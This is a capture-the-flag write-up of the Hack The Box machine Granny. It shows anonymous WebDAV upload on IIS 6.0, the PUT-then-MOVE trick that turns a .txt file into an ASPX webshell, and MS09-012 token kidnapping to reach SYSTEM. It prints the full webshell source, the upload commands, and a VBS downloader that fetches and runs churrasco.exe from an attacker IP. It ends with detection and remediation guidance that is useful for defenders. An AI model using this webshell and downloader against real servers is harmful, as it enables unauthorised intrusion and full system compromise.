Skip to content
Back to all posts

HTB: Granny

· 14 min easy Windows Granny

IIS 6.0 with WebDAV enabled permits unauthenticated file upload via PUT and MOVE, bypassing extension restrictions to deploy an ASPX webshell. Token kidnapping (MS09-012) escalates NETWORK SERVICE to SYSTEM on Windows Server 2003.

#htb #iis #webdav #windows #token-impersonation

Overview

Granny is a companion box to Grandpa. Both run IIS 6.0 on Windows Server 2003 with identical privilege escalation paths. The critical difference is in initial access. On Grandpa, WebDAV write methods return 403 Forbidden, forcing exploitation via a buffer overflow (CVE-2017-7269). On Granny, PUT is permitted. Direct file upload via WebDAV replaces the need for a memory corruption exploit entirely.

The attack chain: upload an ASPX webshell as a .txt file via PUT, then rename it to .aspx via MOVE. Classic ASP (.asp) is blocked in the root virtual directory, but ASP.NET (.aspx) executes because ASP and ASP.NET use separate ISAPI handler mappings in IIS 6.0. Once running as NETWORK SERVICE, token kidnapping via churrasco.exe (MS09-012) escalates to SYSTEM. Total time from port scan to root flag: 4 minutes.

The broader lesson is about access control as a security boundary. Granny and Grandpa are identical systems where a single configuration difference (PUT allowed vs PUT blocked) changes the entire initial access approach.

Reconnaissance

I start with a service-version scan:

nmap -sC -sV -A -T4 -oA scans/granny 10.129.95.234
PortServiceProduct / VersionNotes
80HTTPMicrosoft IIS httpd 6.0Default “Under Construction” page

A single open port. The remaining 999 ports in the default scan range are filtered, indicating a host firewall. Nmap’s WebDAV scan reveals the full method list:

| http-webdav-scan:
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST,
|     COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST,
|     COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Both PUT and MOVE appear in the allowed methods list. On Grandpa, these methods appear in public options but return 403 when tested.

ComponentVersion
Operating SystemWindows Server 2003 SP2 (5.2.3790)
Web ServerMicrosoft IIS 6.0
ExtensionsWebDAV (PUT/MOVE enabled), ASP.NET (.NET 2.0)

Attack Surface Analysis

WebDAV write access confirmation

curl -s -X PUT http://10.129.95.234/test.txt -d "hello world" \
  -o /dev/null -w "%{http_code}"
# 201

curl -s http://10.129.95.234/test.txt
# hello world

PUT returns 201 Created. Uploaded files are immediately accessible.

Extension execution testing

curl -s -X PUT http://10.129.95.234/test.asp \
  -d '<%response.write("test")%>' -o /dev/null -w "%{http_code}"
# 201

curl -s http://10.129.95.234/test.asp -o /dev/null -w "%{http_code}"
# 403

PUT succeeds, but requesting the ASP file returns 403 Forbidden. The root virtual directory blocks classic ASP execution. ASP.NET (.aspx) uses a separate handler and executes without restriction.

Vulnerability Analysis

The attack combines two weaknesses:

1. Unrestricted WebDAV write access (CWE-434). IIS 6.0 is configured with WebDAV enabled for anonymous users. PUT and MOVE accept unauthenticated requests. The MOVE method permits renaming files to any extension, bypassing upload restrictions.

2. MS09-012 token kidnapping (CWE-269). On Windows Server 2003, the NETWORK SERVICE account holds SeAssignPrimaryTokenPrivilege. Churrasco.exe exploits a flaw in how Windows handles token impersonation for service accounts, enabling the creation of a new process running as SYSTEM.

AttributeValue
CVEN/A (WebDAV misconfiguration) + MS09-012
CVSS v39.8 (WebDAV), 7.8 (MS09-012)
CWECWE-434 (Unrestricted Upload), CWE-269 (Improper Privilege)
MITRE ATT&CKT1190 (Initial Access), T1134.001 (Token Impersonation)

Exploitation

ASPX webshell via PUT + MOVE

The webshell uses VB.NET inline code. VB.NET was chosen over C# because .NET 2.0 on Windows Server 2003 handles VB.NET inline compilation more reliably:

cat > shell.aspx << 'EOF'
<%@ Page Language="VB" %>
<%@ Import Namespace="System.Diagnostics" %>
<%
Dim c As String = Request("cmd")
If c <> "" Then
  Dim p As New Process()
  p.StartInfo.FileName = "cmd.exe"
  p.StartInfo.Arguments = "/c " & c
  p.StartInfo.UseShellExecute = False
  p.StartInfo.RedirectStandardOutput = True
  p.StartInfo.RedirectStandardError = True
  p.Start()
  Dim o As String = p.StandardOutput.ReadToEnd()
  o &= p.StandardError.ReadToEnd()
  p.WaitForExit()
  Response.Write("<pre>" & Server.HtmlEncode(o) & "</pre>")
End If
%>
EOF

Upload as .txt, then rename to .aspx:

curl -s -X PUT http://10.129.95.234/shell.txt \
  --data-binary @shell.aspx -o /dev/null -w "%{http_code}"
# 201

curl -s -X MOVE http://10.129.95.234/shell.txt \
  -H "Destination: http://10.129.95.234/shell.aspx" \
  -o /dev/null -w "%{http_code}"
# 201

Confirm RCE:

curl -s "http://10.129.95.234/shell.aspx?cmd=whoami"
# nt authority\network service

Privilege escalation via token kidnapping

NETWORK SERVICE cannot read user profiles directly. Privilege escalation is required for flags.

Windows Server 2003 lacks certutil -urlcache, bitsadmin, and PowerShell. The standard file transfer technique is a VBS XMLHTTP downloader:

# Write VBS downloader line by line through the webshell
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+Set+o%3DCreateObject(%22Microsoft.XMLHTTP%22)+>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+o.Open+%22GET%22,%22http://10.10.14.5:8888/churrasco.exe%22,False+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+o.Send+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+Set+s%3DCreateObject(%22ADODB.Stream%22)+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+s.Open+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+s.Type%3D1+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+s.Write+o.ResponseBody+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+s.SaveToFile+%22C:\WINDOWS\Temp\c.exe%22,2+>>+C:\WINDOWS\Temp\d.vbs"
curl -s "http://10.129.95.234/shell.aspx?cmd=echo+s.Close+>>+C:\WINDOWS\Temp\d.vbs"

# Execute the downloader
curl -s "http://10.129.95.234/shell.aspx?cmd=cscript+C:\WINDOWS\Temp\d.vbs"

Churrasco’s command parser splits on spaces, so paths with spaces (Documents and Settings) require 8.3 short filenames:

# User flag
curl -s "http://10.129.95.234/shell.aspx?cmd=C:\WINDOWS\Temp\c.exe+%22type+DOCUME~1\Lakis\Desktop\user.txt%22"
# [redacted]

# Root flag
curl -s "http://10.129.95.234/shell.aspx?cmd=C:\WINDOWS\Temp\c.exe+%22type+DOCUME~1\ADMINI~1\Desktop\root.txt%22"
# [redacted]

Post-Exploitation

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# OS Name:    Microsoft(R) Windows(R) Server 2003, Standard Edition
# OS Version: 5.2.3790 Service Pack 2 Build 3790

whoami /priv
# SeAuditPrivilege              Disabled
# SeAssignPrimaryTokenPrivilege Disabled
# SeChangeNotifyPrivilege       Enabled

Windows Server 2003 reached end-of-life on 14 July 2015. IIS 6.0 has accumulated hundreds of known CVEs since, including CVE-2017-7269 (disclosed March 2017, two years after EOL). The system is permanently vulnerable.

Defensive Analysis

Detection opportunities

PhaseMITRE ATT&CKDetection
Initial accessT1190IIS logs: PUT and MOVE requests to any URI
Defence evasionT1036.008IIS logs: MOVE with Destination header containing .aspx
PersistenceT1505.003File integrity: new .aspx files in the IIS web root
ExecutionT1059.005Process: cscript.exe launching from C:\WINDOWS\Temp\
Privilege esc.T1134.001Sysmon: NETWORK SERVICE child process running as SYSTEM

IIS W3C logs: PUT and MOVE are not normal HTTP methods in most environments. Any PUT or MOVE request from an external address is a high-confidence indicator, especially when the Destination header contains an executable extension.

Process monitoring: cmd.exe spawned as a child of w3wp.exe is anomalous. An executable dropped to C:\WINDOWS\Temp\ followed by cmd.exe or whoami.exe running as SYSTEM is the churrasco pattern.

VBS downloader detection: cscript.exe or wscript.exe creating Microsoft.XMLHTTP and ADODB.Stream COM objects is a standard post-exploitation indicator.

Remediation

PriorityActionEffortImpact
P0Decommission Windows Server 2003 (EOL since July 2015)HighCritical
P0Disable WebDAV in IIS or block PUT/MOVE at the perimeterLowCritical
P1If WebDAV is required, restrict to authenticated usersLowHigh
P1Block executable extensions in WebDAV upload configurationLowHigh
P2Remove token privileges from service accounts where unneededMediumMedium
P2Deploy WAF blocking WebDAV write methods from external IPsMediumMedium

The fundamental problem is the operating system. Windows Server 2003 has been unsupported for over a decade. Even disabling WebDAV and restricting network access leaves the system vulnerable to kernel exploits, TCP/IP stack vulnerabilities, and other attack vectors that will never be patched. The only defensible remediation is migration to a supported OS.

Key Takeaways

  1. Access control configuration is as important as software patching. Granny and Grandpa run identical software. The only difference is whether PUT is allowed. That single configuration change transforms the initial access approach from a clean file upload to a memory corruption exploit. Configuration hardening deserves the same rigour as patch management.

  2. ASP.NET executes where classic ASP does not. IIS 6.0 has separate handler configurations for ASP and ASP.NET. When one scripting engine is blocked, always test the others. The PUT + MOVE technique (upload as .txt, rename to .aspx) is a standard IIS 6.0 bypass that defenders should test for in hardening reviews.

  3. The VBS XMLHTTP downloader is the standard legacy Windows file transfer technique. Windows Server 2003 lacks certutil -urlcache, bitsadmin, and PowerShell. The Microsoft.XMLHTTP + ADODB.Stream COM objects are the only built-in HTTP download mechanism. Preparing this script in advance saves significant time on legacy targets.

  4. 8.3 short filenames bypass argument parsing issues. Tools that split command arguments on spaces (like churrasco) cannot handle paths such as C:\Documents and Settings. The short names DOCUME~1 and ADMINI~1 avoid this entirely. On any Windows system older than Vista, 8.3 names are generated by default.